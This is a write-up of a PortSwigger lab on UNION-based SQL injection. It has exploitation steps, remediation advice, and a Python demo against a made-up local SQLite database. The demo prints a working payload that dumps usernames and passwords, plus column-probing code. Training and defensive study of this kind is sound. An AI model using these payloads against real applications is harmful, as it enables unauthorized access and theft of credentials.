- Lab URL:
https://portswigger.net/web-security...m-other-tables
- Tools Used:
- Browser
- Burp Suite
Vulnerability Summary:
- Type: SQL injection (UNION-based)
- Description:
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
Steps to Exploit:
1. Using the technique from the previous note (add NULL values to a UNION SELECT until the query stops erroring to get the column count, then put a string into each position in turn to see which columns accept text), determine the number of columns returned by the query and which of them contain text data. Verify that the query returns two columns, both of which contain text.

2. Inject a UNION SELECT payload into the category parameter that places the username and password columns of the users table into those two text columns, then read the administrator's password from the response and use it to log in as administrator.


Remediation:
- Use parameterized queries / prepared statements for every value that comes from the user; a bound parameter cannot change the structure of the query, so a UNION appended to it is just a string that matches no category
- Use server-side input validation (allow-list the expected categories)
- Escape and sanitize user input only as a fallback where parameterization is not possible (for example table or column names), never as the primary control
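The two exploitation steps above and the parameterized-query remediation, worked end to end against a constructed in-memory SQLite database. This is an added example, not code from the lab or from PortSwigger. It assumes a schema like the lab's (a products table filtered by category, and a users table with username and password columns) and uses made-up rows and passwords. One difference from the lab is noted in the code: SQLite is dynamically typed, so the string probe in step 1 succeeds for every column, whereas the lab's database errors on a column that cannot hold text.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the lab back end (assumed schema, made-up data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, description TEXT, category TEXT, released INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES ('Mug',         'A mug',      'Gifts', 1);
        INSERT INTO products VALUES ('Scarf',       'A scarf',    'Gifts', 1);
        INSERT INTO products VALUES ('Secret item', 'Unreleased', 'Gifts', 0);
        INSERT INTO users VALUES ('administrator', 'example-admin-pw');
        INSERT INTO users VALUES ('wiener',        'example-user-pw');
    """)
    return db


def vulnerable_filter(db, category):
    """Mirrors the lab's bug: the category parameter is concatenated into SQL."""
    sql = ("SELECT name, description FROM products "
           f"WHERE category = '{category}' AND released = 1")
    return db.execute(sql).fetchall()


def safe_filter(db, category):
    """Remediated version: the value is bound, so it can never alter the query."""
    sql = ("SELECT name, description FROM products "
           "WHERE category = ? AND released = 1")
    return db.execute(sql, (category,)).fetchall()


def find_column_count(db, max_cols=10):
    """Step 1a: add NULLs until the UNION stops erroring; that count is the answer."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            vulnerable_filter(db, f"Gifts' UNION SELECT {nulls}--")
            return n
        except sqlite3.OperationalError:  # column-count mismatch across the UNION
            continue
    raise RuntimeError("column count not found")


def find_text_columns(db, ncols):
    """Step 1b: put a string in each position in turn and keep the ones that work.

    SQLite accepts text in any column, so both positions pass here; on the lab's
    database a non-text column raises an error and would be left out.
    """
    text_cols = []
    for i in range(ncols):
        vals = ["NULL"] * ncols
        vals[i] = "'abc'"
        try:
            vulnerable_filter(db, f"Gifts' UNION SELECT {','.join(vals)}--")
            text_cols.append(i)
        except sqlite3.OperationalError:
            pass
    return text_cols


def dump_credentials(db):
    """Step 2: the UNION payload, as it would be placed in the category parameter."""
    payload = "Gifts' UNION SELECT username, password FROM users--"
    # Product rows come back alongside the users rows; a dict keyed on the first
    # column lets us pull any username out directly.
    return dict(vulnerable_filter(db, payload))


def admin_password(db):
    return dump_credentials(db)["administrator"]


if __name__ == "__main__":
    db = build_db()
    n = find_column_count(db)
    print("columns:", n, "text columns:", find_text_columns(db, n))
    print("administrator password:", admin_password(db))
    # The same payload against the parameterized query matches nothing.
    print("safe_filter with payload:",
          safe_filter(db, "Gifts' UNION SELECT username, password FROM users--"))
```

Running it walks through the same probing order used in the lab: the column count is found first, the text-capable positions second, and only then is the real payload sent. The last line shows why the remediation works: with a bound parameter the whole payload is compared against the category column as a literal string, so no row matches and nothing leaks.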
Lessons Learned:
Once you know how many columns the original query returns and which of them can hold string data, you can retrieve data from any other table the application's database user can read: put the target table's columns into the text positions of a UNION SELECT and the rows come back in the same place the application normally renders its own results.